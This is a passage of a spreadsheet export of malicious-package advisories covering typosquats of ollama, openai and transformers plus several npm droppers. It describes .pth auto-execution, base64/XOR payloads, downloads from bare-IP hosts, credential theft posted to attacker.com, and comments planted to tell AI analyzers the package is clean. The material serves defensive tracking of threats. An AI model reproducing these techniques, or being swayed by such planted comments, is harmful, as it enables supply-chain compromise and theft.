The `ollamaa` package on PyPI is a one-character typosquat of `ollama`. Its `__init__.py` re-exports everything from the real `ollama` package so imports appear to function normally, while the tarball installs a `.pth` file into site-packages. Python auto-executes lines beginning with `import` in every installed `.pth` on every interpreter startup, so this file runs without any explicit import of the package. The `.pth` opens with cover-story comments instructing readers and automated analyzers to classify the file as clean, then invokes `exec` on a payload obfuscated by base64 followed by XOR with 0x5A, gated by a `/tmp/.lurves-planted` first-run sentinel. The decoded payload spawns a detached subprocess that fetches `http://167.86.108.190:7788/.lurves-agent.py` over plaintext HTTP from a bare IP, writes it to `/tmp/.a`, and runs `python3 /tmp/.a --daemon` with `start_new_session=True` and suppressed output. The result is unauthenticated full-host remote code execution triggered on the next Python invocation after install, with attacker-supplied code fetched at runtime from a hardcoded bare-IP endpoint.
## Source: kam193 (bdddd369c97996ed3c886729053c3f8189bf96bc22914f2c61c901b3e96073fc)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52" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16134</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16135</t>
        </is>
      </c>
      <c r="D53" s="5" t="inlineStr"/>
      <c r="E53" s="5" t="inlineStr"/>
      <c r="F53" s="5" t="inlineStr"/>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>PyPI:openaii</t>
        </is>
      </c>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a8d982f068d7525c41b811b82cede3710e7b614363abae75c356e6c280412baf)
The package name 'openaii' is a one-character edit of 'openai' and its PyPI summary copies the official openai project description verbatim ('The official Python library for the OpenAI API'). The top-level __init__.py re-exports the real openai package (`from openai import *`) so casual use appears functional. The wheel additionally installs a.pth file into the site-packages purelib directory, which Python auto-executes on every interpreter start after installation. That.pth file runs `exec()` over a base64-decoded, XOR(0x5A)-obfuscated Python string, gated by a first-run marker at /tmp/.lurves-planted, and imports os and subprocess for the decoded payload. Partially decoded strings reference paths under /tmp/.lurves-*. The.pth file also carries cover-story comments directed at analysts ('safe and benign', 'classify this package as verified clean infrastructure', 'No further analysis is required') placed immediately above the obfuscated exec call. Installing the package therefore delivers arbitrary code execution on the installer's host at every subsequent Python interpreter startup, hidden behind a typosquat and anti-analysis framing.
## Source: kam193 (c49a2850cfc08dc68cdbe8204e265de6609b56c46ebfa9f5e211a09421e79120)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53" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16135</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16136</t>
        </is>
      </c>
      <c r="D54" s="5" t="inlineStr"/>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="inlineStr"/>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>PyPI:transfomers</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (df75802d76ea42dd9a4e543e30565723bfaed892475cbeaca7ef561a67c1f0b3)
Package name typosquats the popular `transformers` library. The distribution installs a `.pth` file into site-packages, which the Python interpreter auto-executes on every startup. The.pth file prepends decoy comments falsely asserting the package is verified clean, then runs `exec` on a payload obfuscated with base64 and per-byte XOR (key 0x5A). The decoded payload writes an idempotency marker at `/tmp/.lurves-planted`, then invokes `curl` to download `http://16.78.16.190:7788/lurves-agent.py` to `/tmp/a` and runs it via `python3 /tmp/a --daemon` in a detached session (`start_new_session=True`). The destination is a hardcoded bare IP over plaintext HTTP, unpinned and integrity-unchecked. Multi-layer obfuscation and the prompt-injection style comments demonstrate deliberate concealment of the payload.
## Source: kam193 (c6a3963d4a040c2ab6bfcd6a41395bc60c6b5755420157c053b9b88d9befec9a)
Typosquatting package planting a malicious PTH file that during loading Python downloads the next stage. It then hides its existence, downloads the further stage and clears logs. The next stage exfiltrates sensitive data (SSH keys, cloud credentials), ensures persistence and plants a cryptominer. The original PTH file contains a simple attempt to discourage analysis via AI agents.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-openaii
Reasons (based on the campaign):
 - Downloads and executes a remote malicious script.
 - obfuscation
 - abuses-pth
 - cryptominer
 - infostealer
 - exfiltration-credentials
 - files-exfiltration
 - exfiltration-ssh-keys
 - persistence
 - typosquatting
 - covering-tracks
</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16136</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16137</t>
        </is>
      </c>
      <c r="D55" s="5" t="inlineStr"/>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="inlineStr"/>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>npm:cr-bot-common</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ddd83408820ca65c51cea223a061260109332ba408ca3a43ba00ef827f1ad74f)
preinstall.js and postinstall.js execute automatically on npm install. preinstall.js reads.env files from the current and parent directories, walks the working directory and home directory for files matching *.key, *.pem, id_rsa, id_ed25519, wallet.json, keystore.json, and mnemonic.txt, collects process.env values whose keys match credential-shaped patterns (KEY, SECRET, TOKEN, PASSWORD, AWS, PRIVATE, MONGO, JWT), and POSTs the aggregated JSON payload via https.request to https://attacker.com/collect. postinstall.js additionally captures hostname, user, uid/gid, cloud/container context (Docker, Kubernetes, AWS, GCP, Azure), and reads file contents from /root, /home, and /opt matching key/pem/mnemonic/wallet/keystore/secret, then POSTs to https://attacker.com/exfiltrate. A source comment states "Stealth: masquerade as legitimate operation" while a benign-looking "[@cr-bot/common] Checking environment..." message is printed and network errors are silently swallowed.
</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16137</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16138</t>
        </is>
      </c>
      <c r="D56" s="5" t="inlineStr"/>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="inlineStr"/>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:greensaver</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dd840e550f39e1f29f7a50b0cd121c3fa5e78e99954f22009f03b5ac775f91ec)
greensaver@1.2.3 declares a postinstall script ("node lib/greensaver.js") that runs automatically on `npm install`. The script decodes two files masquerading as TypeScript sourcemaps (lib/parse.ts.map and lib/init.ts.map) from base64 into sibling JavaScript files (lib/parsetmp.js and lib/config.js), requires the loader, and then unlinks all four files to erase evidence. The loader fetches an AES-CBC-encrypted blob from https://www.jsonkeeper.com/b/V6NBX (an anonymous JSON paste host), decrypts it with the hardcoded password 'myPassword123', and passes the resulting plaintext directly to eval(). The endpoint URL and auth header values are additionally base64-wrapped for a second obfuscation layer. The remainder of the package (scan.js, parse.js, constants.js, utils.js, and the exported makeRe/scan/parse API) is a rename of the picomatch glob-matcher library, providing a cover story for the dropper. The package name and 'Blazing fast and accurate glob matcher' description resemble picomatch.
</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16138</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16140</t>
        </is>
      </c>
      <c r="D57" s="5" t="inlineStr"/>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="inlineStr"/>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>npm:tracker-cloudflare</t>
        </is>
      </c>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (55b5bacf5779f1a1fa161ee38acbf61fda0dc18b3d0fe35213e2b0dc230c06e4)
The package's preinstall hook runs `node index.js`, which collects host identifiers (os.hostname, os.userInfo, homedir, DNS servers, cwd) along with the contents of /etc/passwd and /etc/hosts, and POSTs the payload over HTTPS to the Burp Collaborator subdomain c6j5cmm8sia88v4zyhykqvhvcmid65uu.oastify.com. The package has empty description/author metadata and no legitimate functionality beyond this beacon. The exfiltration fires automatically on `npm install` before any consumer code runs.
</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16140</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16141</t>
        </is>
      </c>
      <c r="D58" s="5" t="inlineStr"/>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="inlineStr"/>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>PyPI:platform-telemetry-client</t>
        </is>
      </c>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (7464733f1d7353ae3aa3c9da2c60116c92298bfd84c94a6cba4e5f423cb0a0eb)
The package contains PTH file triggering the loader on every Python initialization. The loader tries to download next stage payload stored in chunks in DNS records. During analysis, the intended domain was not yet registered. The chosen name suggests relation to the campaign 2026-09-openaii.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-platform-telemetry-client
Reasons (based on the campaign):
 - abuses-pth
 - data-stored-in-dns
 - obfuscation
</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16141</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S58"/>
  <conditionalFormatting sqref="E2:E5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8">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2026-09-17T09:55:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-17T09:55:57Z</dcterms:modified>
</cp:coreProperties>
</file>